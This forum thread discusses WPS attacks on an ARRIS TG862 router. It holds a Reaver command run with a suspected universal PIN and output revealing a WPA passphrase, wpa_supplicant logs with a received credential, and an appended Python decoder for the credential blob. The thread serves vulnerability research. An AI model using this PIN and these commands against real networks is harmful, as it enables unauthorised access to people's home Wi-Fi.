Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #1
    Just checked the configuration of the router and the pin DOES NOT match. The pin in the configuration was 84237446

    Screenshot2.png

    But attempting 42000648 does indeed work!

    Code:
    root@kali:~/Desktop# reaver -b 00:AC:E0:3E:DB:10 -vv -i mon0 -p 42000648
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    
    [+] Waiting for beacon from 00:AC:E0:3E:DB:10
    [+] Switching mon0 to channel 6
    [+] Associated with 00:AC:E0:3E:DB:10 (ESSID: HOME-XXXX)
    [+] Trying pin 42000648
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 9 seconds
    [+] WPS PIN: '42000648'
    [+] WPA PSK: 'basket1744chase'
    [+] AP SSID: 'HOME-XXXX'
    [+] Nothing done, nothing to save.
    But attempting the PIN in the configuration doesn't work. And unless I am looking at this wrong, in the screenshot above, isn't WPS PIN entry disabled?
    Last edited by aanarchyy; 2015-03-29 at 16:57. Reason: Typo

  2. #2
    I'm glad you tested it; however, that is extremely weird. Perhaps Comcast uses this same undiscovered PIN (until now) on all their TG862 models...?

  3. #3

    Confirmed

    I just had this same thing happen with a TG862



    Client wps.manufacturer :
    Client wps.device_name :
    Client wps.os_version : 2147483648
    Client wlan.ta : 00:19:e3:06:7e:44
    Client wps.model_name :
    Client wps.model_number :
    Client wps.serial_number :
    AP wps.manufacturer : ARRIS
    AP wps.device_name : ARRIS TG862 Router
    AP wps.os_version : 2147483648
    AP wlan.ta : 00:1d:d6:ab:8f:40
    AP wps.model_name : TG862G
    AP wps.model_number : RT2860
    AP wps.serial_number : 12345678

    Additionally, it appears to receive the creds, then fail the WPS?

    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>Associated with 00:1d:d6:REDACTED
    <3>CTRL-EVENT-EAP-STARTED EAP authentication started
    <3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
    <3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
    <3>WPS-CRED-RECEIVED 100e003c102600010110450009484f4d452d38463432100300 020022100f0002000c10270010314443384538303932413943 3030343110200006001dd6ab8f40
    <3>WPS-FAIL msg=11 config_error=0
    <3>CTRL-EVENT-EAP-FAILURE EAP authentication failed
    <3>WPS-FAIL
    <3>CTRL-EVENT-DISCONNECTED bssid=00:00:00:00:00:00 reason=3
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>Associated with 00:1d:d6:REDACTED
    <3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
    <3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]
    <3>CTRL-EVENT-DISCONNECTED bssid=00:1d:d6:REDACTED reason=4
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>CTRL-EVENT-SCAN-RESULTS
    <3>WPS-AP-AVAILABLE
    <3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
    <3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
    <3>Associated with 00:1d:d6:REDACTED
    <3>CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully (based on lower layer success)
    <3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
    <3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]

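A decoder for the hex that follows WPS-CRED-RECEIVED in the wpa_supplicant log above, which shows that the supplicant did receive a complete credential (SSID, network key, auth/encryption types, AP MAC) before the WPS-FAIL. This is an added example, not code from the post or from Reaver/pixiewps; it follows the standard WSC TLV attribute layout and decodes a constructed sample blob with placeholder SSID, key and MAC rather than the poster's own values.

```python
import struct

# WSC attributes are TLVs (2-byte type, 2-byte length, big-endian); Credential 0x100E wraps the rest.
ATTR_CREDENTIAL = 0x100E
ATTR_NAMES = {0x1026: "network_index", 0x1045: "ssid", 0x1003: "auth_type",
              0x100F: "encr_type", 0x1027: "network_key", 0x1020: "mac_addr"}
AUTH_FLAGS = {0x0001: "Open", 0x0002: "WPA-PSK", 0x0004: "Shared",
              0x0008: "WPA", 0x0010: "WPA2", 0x0020: "WPA2-PSK"}
ENCR_FLAGS = {0x0001: "None", 0x0002: "WEP", 0x0004: "TKIP", 0x0008: "AES"}

def iter_attrs(buf):
    """Yield (type, value) from a WSC TLV buffer, refusing truncated or overrunning attributes."""
    off = 0
    while off < len(buf):
        if off + 4 > len(buf):
            raise ValueError("truncated attribute header at offset %d" % off)
        atype, alen = struct.unpack_from(">HH", buf, off)
        off += 4
        if off + alen > len(buf):
            raise ValueError("attribute 0x%04x length %d overruns buffer" % (atype, alen))
        yield atype, buf[off:off + alen]
        off += alen

def decode_credential(hex_blob):
    """Turn the hex after WPS-CRED-RECEIVED into readable fields (SSID, key, auth, encryption, MAC)."""
    outer = dict(iter_attrs(bytes.fromhex(hex_blob.replace(" ", ""))))
    if ATTR_CREDENTIAL not in outer:
        raise ValueError("no Credential (0x100e) attribute in blob")
    cred = {}
    for atype, val in iter_attrs(outer[ATTR_CREDENTIAL]):
        name = ATTR_NAMES.get(atype, "attr_0x%04x" % atype)
        if atype == 0x1026:
            cred[name] = val[0]
        elif atype in (0x1045, 0x1027):
            cred[name] = val.decode("utf-8", errors="replace")
        elif atype in (0x1003, 0x100F):  # bit-flag fields: list the names of the set bits
            table, bits = (AUTH_FLAGS if atype == 0x1003 else ENCR_FLAGS), struct.unpack(">H", val)[0]
            cred[name] = [n for bit, n in sorted(table.items()) if bits & bit]
        elif atype == 0x1020:
            cred[name] = ":".join("%02x" % b for b in val)
        else:
            cred[name] = val.hex()
    return cred

# Constructed sample: same layout as the post's 60-byte Credential, with placeholder SSID/key/MAC.
SAMPLE_CRED = ("100e003c" + "1026000101"                      # network index 1
               + "10450009484f4d452d54455354"                # SSID "HOME-TEST"
               + "100300020022" + "100f0002000c"             # auth WPA-PSK|WPA2-PSK, encr TKIP|AES
               + "102700106578616d706c656b6579313233343536"  # network key "examplekey123456"
               + "10200006001122334455")                     # AP MAC 00:11:22:33:44:55
```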
